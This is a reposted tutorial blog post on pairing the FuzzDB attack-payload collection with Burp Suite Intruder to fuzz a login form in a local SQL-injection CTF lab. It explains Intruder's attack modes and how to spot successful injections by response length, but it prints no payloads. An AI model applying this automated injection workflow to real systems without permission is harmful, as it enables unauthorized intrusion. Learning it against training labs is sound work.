[Security Testing Learning] Automated Injection Attack FuzzDB and Burp Combination Boxing

Mobile 2023-10-07 11:54:29 views: null

1. FuzzDB

The open source application fuzz testing database contains a collection of test cases for various attack payloads.

The main function:

  1. OS command injection
  2. directory traversal
  3. File upload bypass
  4. Authentication bypass
  5. XSS
  6. SQL injection
  7. HTTP header injection
  8. CRLF injection
  9. NoSQL injection and more
  10. It also includes some webshells written in different languages ​​and commonly used account and password dictionaries.

github地址:GitHub - fuzzdb-project/fuzzdb: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.

Download to local.

Unzip, where under attack are various attack payloads.

2. Use SQLi-CTF shooting range:

github地址:GitHub - Corb3nik/SQLi-CTF: A training CTF covering non-blind SQL injection techniques

Installation and deployment steps:

1) Download SQLi-CTF-master locally.

Unzip.

2) Switch to the decompressed directory: cd SQLi-CTF-master

3) Run: docker-compose up

4) Visit: http://127.0.0.1:12000 . If the following page is displayed, it means the service is started successfully.

Practical exercises:

1) Select Level2

2) Enter the username test and password test123, and use Burp Suite to intercept the login request.

Send the login request to Intruder and replace the payload with only the login user name.

Attack type description:

sniper: Use a single dictionary and only change one parameter at a time. If username and password are both variables, username will be traversed through the dictionary first, password will remain unchanged, and then password will be changed, while username will remain unchanged.

Battering ram: Use a single dictionary, have multiple variables, and change to the same value at the same time.

Pitchfork tuning fork: one dictionary per variable. After a failure, three variables change at the same time, and one variable will not match all situations of the other variable.

Cluster bomb: In the form of Cartesian product, every other variable must be tested with another variable in all situations. In the case of multiple dictionaries, the test time is very long.

In this example, the login username payload is: fuzzdb-master\attack\sql-injection\detect\xplatform.txt

After Burpsuite loads the payload:

Setting Options:

Click to start the attack:

Attack results:

The illustration loads multiple dictionaries, and it is found that multiple attack scripts can be penetrated.

This example uses the length to determine which ones were successfully injected and found multiple successful injections. The length here is the length of the returned page.

 The above comes from the content of the "Web Security Attack and Defense Practice" course of Geek Time, which is summarized and compiled. 

Guess you like

Origin blog.csdn.net/aovenus/article/details/127931085
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com